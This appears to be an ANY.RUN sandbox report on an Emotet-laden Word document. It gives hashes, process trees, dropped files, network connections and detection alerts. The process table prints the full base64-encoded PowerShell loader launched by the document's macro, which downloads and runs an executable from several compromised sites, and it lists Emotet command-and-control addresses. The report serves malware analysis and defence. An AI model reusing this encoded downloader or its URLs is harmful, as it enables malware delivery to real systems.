analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DOC_9BDUYOY3.doc

Full analysis: https://app.any.run/tasks/1329c74e-13e8-4e3a-843c-6e759574cf99
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 30, 2020, 05:03:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Sed., Author: Matho Dumont, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:12:00 2020, Last Saved Time/Date: Tue Sep 29 23:12:00 2020, Number of Pages: 1, Number of Words: 3731, Number of Characters: 21269, Security: 8
MD5:

43F5F1AD856544868F0D9F522A0ACE55

SHA1:

6F296BCE9E4BADEB423444679008AA77A60E723C

SHA256:

A9B4569007C2822D7D717A8EA3A4E3A496C52A3F2011519CA3C4DD5E42011465

SSDEEP:

1536:TNVLAAAAcAAAAAUmPxwMddylbvuNm9F96qpsWAfjlyqd:TLAAAAcAAAAAUSxRYs4SLlyqd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Pccesw28f.exe (PID: 1436)
      • osbaseln.exe (PID: 2772)

    • Changes the autorun value in the registry

      • osbaseln.exe (PID: 2772)

    • Connects to CnC server

      • osbaseln.exe (PID: 2772)

    • EMOTET was detected

      • osbaseln.exe (PID: 2772)

  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 3792)

    • PowerShell script executed

      • POwersheLL.exe (PID: 3792)

    • Executed via WMI

      • POwersheLL.exe (PID: 3792)

    • Executable content was dropped or overwritten

      • Pccesw28f.exe (PID: 1436)
      • POwersheLL.exe (PID: 3792)

    • Starts itself from another location

      • Pccesw28f.exe (PID: 1436)

    • Reads Internet Cache Settings

      • osbaseln.exe (PID: 2772)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2560)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2560)

    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 3792)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 24951
Paragraphs: 49
Lines: 177
Company: -
Security: Locked for annotations
Characters: 21269
Words: 3731
Pages: 1
ModifyDate: 2020:09:29 22:12:00
CreateDate: 2020:09:29 22:12:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Mathéo Dumont
Subject: -
Title: Sed.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe pccesw28f.exe #EMOTET osbaseln.exe

Process information

PID
CMD
Path
Indicators
Parent process
2560"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DOC_9BDUYOY3.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3792POwersheLL -ENCOD JABKADYAZQBvADQAMAA1AD0AKAAoACcAUAB5ACcAKwAnAHgAMQBnACcAKQArACcAeQA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAGUAUgBwAFIAbwBmAGkATABlAFwAQQBiAEMAcQAwAEwANABcAFAARQBpAGsAcAA0AFQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBjAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAFUAYABSAGkAYABUAFkAUAByAG8AdABPAGMAYABPAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxADIAJwArACcALAAnACsAJwAgAHQAJwApACsAJwBsACcAKwAoACcAcwAxADEALAAnACsAJwAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABYADkAZgAzAG4AeQBlACAAPQAgACgAJwBQACcAKwAoACcAYwBjAGUAcwAnACsAJwB3ACcAKQArACgAJwAyADgAJwArACcAZgAnACkAKQA7ACQASABmAGoANABwAGUAcAA9ACgAJwBMAHQAJwArACgAJwB1ADIAJwArACcAZAAnACkAKwAnAGMAaQAnACkAOwAkAEcAOQA0ADgAawBzAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAKAAnAEUAUgBBACcAKwAnAGIAYwBxACcAKQArACgAJwAwAGwANAAnACsAJwBjAEUAJwApACsAKAAnAFIAUABlAGkAawAnACsAJwBwACcAKwAnADQAJwApACsAKAAnAHQAYwBFACcAKwAnAFIAJwApACkALgAiAHIARQBwAGwAQQBgAGMARQAiACgAKAAnAGMAJwArACcARQBSACcAKQAsACcAXAAnACkAKQArACQAWAA5AGYAMwBuAHkAZQArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFcAawB6AGMAcwA5AGwAPQAoACcAUgBtACcAKwAoACcAMgBvAGQAJwArACcAMgBlACcAKQApADsAJABFAHAAdQBtAGwAdwA2AD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMATABJAGUATgBUADsAJABJAHoAcwB1AHkAbQBxAD0AKAAoACcAaAB0AHQAcAAnACsAJwBzACcAKQArACgAJwA6AC8ALwB0AHIAdQAnACsAJwBlAHQAZQAnACsAJwBlAHMAJwArACcAaABpACcAKQArACgAJwByAHQALgBjAG8AbQAvACcAKwAnAHcAcAAtAGEAZABtACcAKwAnAGkAJwApACsAKAAnAG4AJwArACcALwA1AC8AJwApACsAKAAnACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAnAHMAOgAnACsAKAAnAC8ALwBuAGgAYQAnACsAJwBwACcAKQArACgAJwBoAG8AJwArACcAbQBhAHUALgBjAG8AJwApACsAJwBtACcAKwAnAC8AcwAnACsAKAAnAGEANwAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwBlAGMAJwApACsAJwBrAC0AJwArACgAJwBlAGwAJwArACcAZQAnACsAJwBjAHQAcgAnACkAKwAoACcAaQAnACsAJwBjAC4AYwAnACsAJwBvAG0ALwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAoACcAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvAHYAJwArACcAVQAnACkAKwAnAEIAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwB0ACcAKQArACgAJwBlACcAKwAnAGMAaAAnACkAKwAoACcAaQBuACcAKwAnAG8AdAAnACsAJwBpAGYAaQBjAGEAdAAnACsAJwBpACcAKQArACgAJwBvACcAKwAnAG4ALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQBpACcAKwAnAG4AJwApACsAJwBjACcAKwAoACcAbAB1AGQAZQBzACcAKwAnAC8AJwApACsAKAAnAGkAaQAxACcAKwAnAHAAZAAnACkAKwAoACcAMAAnACsAJwB4AC8AKgAnACsAJwBoAHQAdAAnACkAKwAoACcAcAAnACsAJwA6AC8ALwAnACsAJwBlAGQAaQB0AHoAYQByACcAKwAnAG0AeQAuACcAKQArACcAYwAnACsAJwBvACcAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAbwB1AHIAJwApACsAKAAnAG4AJwArACcAYQBsAC8AVwAnACkAKwAoACcAaQBuAEUAJwArACcAQQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzACcAKwAnADoALwAvAG4AbwBpAHQAaAAnACsAJwBhACcAKQArACgAJwB0AGYAJwArACcAaABvAHUAcwAnACsAJwBlAC4AYwBvAG0AJwArACcALwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQAnACkAKwAnAG4AJwArACgAJwBjACcAKwAnAGwAdQBkAGUAcwAvACcAKQArACcAZwAnACsAKAAnADUASgBJADIAMQBTAC8AKgAnACsAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8AJwArACcALwB0AGUAYwBoAGkAdAAnACsAJwByAGUAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGkAbgBjAGwAdQAnACkAKwAnAGQAZQAnACsAKAAnAHMALwAnACsAJwBxAE8ALwAnACkAKQAuACIAcwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABHAHkAeQB5AHYANABqAD0AKAAoACcASQAnACsAJwB4AGkAJwApACsAJwBsACcAKwAoACcAbgAnACsAJwA3AF8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQADEAMABjAGcAdgBjACAAaQBuACAAJABJAHoAcwB1AHkAbQBxACkAewB0AHIAeQB7ACQARQBwAHUAbQBsAHcANgAuACIARABPAGAAdwBOAGwATwBhAGAARABgAEYAaQBMAGUAIgAoACQAUAAxADAAYwBnAHYAYwAsACAAJABHADkANAA4AGsAcwBkACkAOwAkAFgAagAzAHIAaQBjAHkAPQAoACcAVgAnACsAKAAnAF8AJwArACcAZQAnACsAJwBjAG4AYQByACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEcAOQA0ADgAawBzAGQAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANAAwADkAOQApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABHADkANAA4AGsAcwBkACkAOwAkAEoAcwBwAG8AdQB5AGMAPQAoACgAJwBFACcAKwAnADMANgB6AF8AJwApACsAJwA5ACcAKwAnADUAJwApADsAYgByAGUAYQBrADsAJABUAHIANQAwAHkAMABnAD0AKAAoACcASAA1ACcAKwAnAHcAeQBnACcAKQArACcAZgBsACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgA4AGEAbgB1AHcAbgA9ACgAKAAnAFIAJwArACcAcQBjAGwAJwApACsAJwA0ACcAKwAnAHoANgAnACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1436"C:\Users\admin\Abcq0l4\Peikp4t\Pccesw28f.exe" C:\Users\admin\Abcq0l4\Peikp4t\Pccesw28f.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
2772"C:\Users\admin\AppData\Local\mlang\osbaseln.exe"C:\Users\admin\AppData\Local\mlang\osbaseln.exe
Pccesw28f.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Version:
2.8.0.3
Total events
2 296
Read events
1 359
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA614.tmp.cvr
MD5:
SHA256:
3792POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HQWZFI60HQZAXCOUSX73.temp
MD5:
SHA256:
3792POwersheLL.exeC:\Users\admin\Abcq0l4\Peikp4t\Pccesw28f.exe
MD5:
SHA256:
1436Pccesw28f.exeC:\Users\admin\AppData\Local\Temp\~DF6D7800043AF6C905.TMP
MD5:
SHA256:
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7E362C7C2619641807C963D68F4EC12B
SHA256:0DAD70F74A565F560A05A6C8A616632F472DE2A54563699CBD6B9222D5989191
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:664D9EE846145198D0D1AD23EC82E532
SHA256:C79E49105526F74F1210DAB0ACC2F27C8B11416FA6B2A85A7B8D8D8EB1128593
2560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:BF2857DBF5BB4ABB7C0C3F4E87C6A922
SHA256:4E5E17C114EBC97419FF12C0A068D3881328E73B769B3D471C00895B4F449A19
1436Pccesw28f.exeC:\Users\admin\AppData\Local\mlang\osbaseln.exeexecutable
MD5:2AAC70FDF909FBBB3F3DE1AE9D833652
SHA256:AB3D7BA306253DD5219BC66BBDC350D1EDA89CBDBC7CF184E3384CF6DD1C1EFF
2560WINWORD.EXEC:\Users\admin\Desktop\~$C_9BDUYOY3.docpgc
MD5:C999B195735511E4D5F34CA5A9FBBBA6
SHA256:803A6B738DE7C10FC01F131E59E269FF59F8835FBAEB306EF319033E6833E0FA
2560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DOC_9BDUYOY3.doc.LNKlnk
MD5:23B470C269F672D56FFD7BA12D8AA102
SHA256:89080433853419A6D072538F0A1C9CA62E0E13524ABF6EB87F34B3828AB61AB4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2772
osbaseln.exe
POST
200
104.193.103.61:80
http://104.193.103.61/DcIrZFpFhPeMUcVS5d/z6JvSTGt0/r0UDTwEhw/PzTJ7yw7SywuB6h5/HC1mv/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3792
POwersheLL.exe
172.67.154.168:443
trueteeshirt.com
US
unknown
3792
POwersheLL.exe
202.182.109.85:443
nhaphomau.com
Managed Solutions Internet AS Internet Service Provider
AU
unknown
2772
osbaseln.exe
104.193.103.61:80
Delcom, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
trueteeshirt.com
  • 172.67.154.168
  • 104.28.25.228
  • 104.28.24.228
unknown
nhaphomau.com
  • 202.182.109.85
unknown

Threats

PID
Process
Class
Message
2772
osbaseln.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
DOC_9BDUYOY3.doc